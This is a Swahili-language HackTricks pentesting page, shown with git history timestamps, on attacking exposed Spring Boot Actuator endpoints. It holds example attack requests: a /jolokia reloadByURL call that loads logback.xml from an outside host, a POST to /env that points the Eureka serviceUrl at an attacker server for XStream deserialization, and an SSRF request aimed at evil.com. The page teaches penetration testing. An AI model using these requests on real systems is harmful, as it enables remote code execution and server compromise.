hacktricks/network-services-pentesting/pentesting-web/spring-actuators.md

92 lines
5.7 KiB
Markdown
Raw Normal View History

2022-10-10 09:20:50 +00:00
# Spring Actuators
2022-04-28 16:01:33 +00:00
<details>
2024-02-11 02:13:58 +00:00
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 02:13:58 +00:00
Njia nyingine za kusaidia HackTricks:
2023-12-31 01:24:39 +00:00
2024-02-11 02:13:58 +00:00
* Ikiwa unataka kuona **kampuni yako inatangazwa katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
2022-04-28 16:01:33 +00:00
</details>
2023-03-02 18:08:43 +00:00
## **Spring Auth Bypass**
<figure><img src="../../.gitbook/assets/image (5) (2).png" alt=""><figcaption></figcaption></figure>
2023-03-02 18:08:43 +00:00
2024-02-11 02:13:58 +00:00
**Kutoka** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)\*\*\*\*
2020-10-15 10:27:50 +00:00
2024-02-11 02:13:58 +00:00
## Kudukua Spring Boot Actuators
2020-10-15 10:27:50 +00:00
2024-02-11 02:13:58 +00:00
**Angalia chapisho halisi kutoka** [**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**]
2023-03-02 18:08:43 +00:00
2024-02-11 02:13:58 +00:00
### **Mambo Muhimu:**
2020-10-15 10:27:50 +00:00
2024-02-11 02:13:58 +00:00
- Spring Boot Actuators hujisajili kwa njia ya mwisho kama vile `/health`, `/trace`, `/beans`, `/env`, nk. Katika toleo 1 hadi 1.4, njia hizi zinapatikana bila uwakilishi. Kutoka toleo 1.5 kuendelea, ni `/health` na `/info` tu ambazo sio nyeti kwa chaguo-msingi, lakini watengenezaji mara nyingi huondoa usalama huu.
- Baadhi ya njia za Actuator zinaweza kuweka wazi data nyeti au kuruhusu hatua zenye madhara:
- `/dump`, `/trace`, `/logfile`, `/shutdown`, `/mappings`, `/env`, `/actuator/env`, `/restart`, na `/heapdump`.
- Katika Spring Boot 1.x, actuators zinasajiliwa chini ya URL ya msingi, wakati katika 2.x, zinasajiliwa chini ya njia ya msingi ya `/actuator/`.
2020-10-15 10:27:50 +00:00
2024-02-11 02:13:58 +00:00
### **Mbinu za Kudukua:**
2020-10-15 10:27:50 +00:00
2024-02-11 02:13:58 +00:00
1. **Utekelezaji wa Kanuni Kijijini kupitia '/jolokia'**:
- Njia ya actuator ya `/jolokia` inafunua Maktaba ya Jolokia, ambayo inaruhusu ufikiaji wa HTTP kwa MBeans.
- Hatua ya `reloadByURL` inaweza kutumiwa kudukua upya mipangilio ya kuingiza kumbukumbu kutoka kwenye URL ya nje, ambayo inaweza kusababisha XXE isiyoonekana au Utekelezaji wa Kanuni Kijijini kupitia mipangilio ya XML iliyoundwa kwa ustadi.
- URL ya kudukua mfano: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`.
2020-10-15 10:27:50 +00:00
2024-02-11 02:13:58 +00:00
2. **Ubunifu wa Mazingira kupitia '/env'**:
- Ikiwa Maktaba za Spring Cloud zipo, njia ya `/env` inaruhusu ubadilishaji wa mali za mazingira.
- Mali zinaweza kubadilishwa ili kudukua udhaifu, kama udhaifu wa uingizaji wa XStream katika huduma ya Eureka serviceURL.
- Ombi la kudukua mfano la POST:
2020-10-15 10:27:50 +00:00
2024-02-11 02:13:58 +00:00
```
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
2020-10-15 10:27:50 +00:00
2024-02-11 02:13:58 +00:00
eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
```
2020-10-15 10:27:50 +00:00
2024-02-11 02:13:58 +00:00
3. **Mipangilio Mengine yenye Manufaa**:
- Mali kama `spring.datasource.tomcat.validationQuery`, `spring.datasource.tomcat.url`, na `spring.datasource.tomcat.max-active` zinaweza kubadilishwa kwa ajili ya kudukua mbalimbali, kama vile kuingiza SQL au kubadilisha vifungo vya uunganisho wa database.
2020-10-15 10:27:50 +00:00
2024-02-11 02:13:58 +00:00
### **Maelezo Zaidi:**
2020-10-15 10:27:50 +00:00
2024-02-11 02:13:58 +00:00
- Orodha kamili ya actuators za msingi inaweza kupatikana [hapa](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt).
- Njia ya `/env` katika Spring Boot 2.x hutumia muundo wa JSON kwa ubadilishaji wa mali, lakini dhana kuu inabaki kuwa ile ile.
2020-10-15 10:27:50 +00:00
2024-02-11 02:13:58 +00:00
### **Mada Zinazohusiana:**
2020-10-15 10:27:50 +00:00
2024-02-04 16:10:29 +00:00
1. **Env + H2 RCE**:
2024-02-11 02:13:58 +00:00
- Maelezo kuhusu kudukua mchanganyiko wa njia ya `/env` na H2 database yanaweza kupatikana [hapa](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database).
2020-10-15 10:27:50 +00:00
2024-02-11 02:13:58 +00:00
2. **SSRF kwenye Spring Boot kupitia Ufafanuzi Mbaya wa Jina la Njia**:
- Namna Spring framework inavyoshughulikia vigezo vya matriksi (`;`) katika majina ya njia za HTTP inaweza kudukuliwa kwa ajili ya Udukuzi wa Ombi la Upande wa Seva (SSRF).
- Ombi la kudukua mfano:
2020-10-15 10:27:50 +00:00
2024-02-11 02:13:58 +00:00
```http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
```
2020-10-15 10:27:50 +00:00
2022-04-28 16:01:33 +00:00
<details>
2024-02-11 02:13:58 +00:00
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 02:13:58 +00:00
Njia nyingine za kusaidia HackTricks:
2023-12-31 01:24:39 +00:00
2024-02-11 02:13:58 +00:00
* Ikiwa unataka kuona **kampuni yako inatangazwa katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
2022-04-28 16:01:33 +00:00
</details>